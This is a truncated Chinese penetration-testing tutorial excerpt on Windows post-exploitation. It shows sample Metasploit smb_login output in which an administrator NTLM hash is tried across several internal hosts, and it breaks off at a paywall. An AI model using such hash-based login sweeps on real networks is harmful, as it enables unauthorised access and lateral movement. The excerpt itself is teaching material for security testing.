渗透测试:Windows与Linux/UNIX后渗透技术详解
1. Windows后渗透技术
在Windows系统的后渗透阶段,有三个关键目标:维持可靠的重新进入、收集凭证以及横向移动。
1.1 SMB登录扫描
使用Metasploit的 auxiliary(scanner/smb/smb_login) 模块进行扫描。示例扫描结果如下:
[+] 10.0.10.208:445 - 10.0.10.208:445 – Success
'.\administrator:aad3b435b51404eeaad3b435b51404ee:c1ea09ab1bab83a9c9c1f1c3
6576737' Administrator
[+] 10.0.10.207:445 - 10.0.10.207:445 – Success
'.\administrator:aad3b435b51404eeaad3b435b51404ee:c1ea09ab1bab83a9c9c1f1c3
6576737' Administrator
[-] 10.0.10.200:445 - 10.0.10.200:445 - Failed:
'.\administrator:aad3b435b51404eeaad3b435b51404ee:c1ea09ab1bab83a9c9c1f1c3
6576737',
[*] Scanned 1 of 8 hosts (12% complete)
[*] Scanned 2 of 8 hosts (25%
超级会员免费看
订阅专栏 解锁全文
1200

被折叠的 条评论
为什么被折叠?



